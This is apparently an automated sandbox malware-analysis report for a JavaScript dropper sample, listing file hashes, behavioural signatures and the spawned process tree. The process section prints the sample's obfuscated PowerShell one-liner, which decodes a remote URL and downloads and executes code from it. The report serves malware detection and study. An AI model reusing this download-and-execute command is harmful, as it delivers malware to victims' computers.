Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
31/10/2023, 20:21
Static task
static1
Behavioral task
behavioral1
Sample
NQRX0468_5871143.js
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
NQRX0468_5871143.js
Resource
win10v2004-20231020-en
General
-
Target
NQRX0468_5871143.js
-
Size
270KB
-
MD5
a2e2da4033a7080a9b5d3fa24d150a8e
-
SHA1
285433bc8135b46f468fb6d0c374c482b164e938
-
SHA256
968593a6e89a4498ec0a56643dde91dc2412a9e2344c0b97a79af38b1ef26727
-
SHA512
9fc5d4e8205042971e4c253346c5c3ae380db9baf6fd17ef3264ed79e2bdc70089b1efd1f3d99e50f1a24b9bba47d308e0a1b68cd81609165c337905675ef908
-
SSDEEP
1536:JNiN4YlrlHqsDNgJqQAXq8+8EYYZPPnvqgu0V2OkHKFl8OBlaGLsAX5dYiTlSQpP:uNbqsCQ9B5qqF7Wl8xap7Htn7
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2812 2380 conhost.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\NQRX0468_5871143.js1⤵PID:2888
-
C:\Windows\system32\conhost.execonhost --headless powershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)1⤵
- Process spawned unexpected child process
PID:2812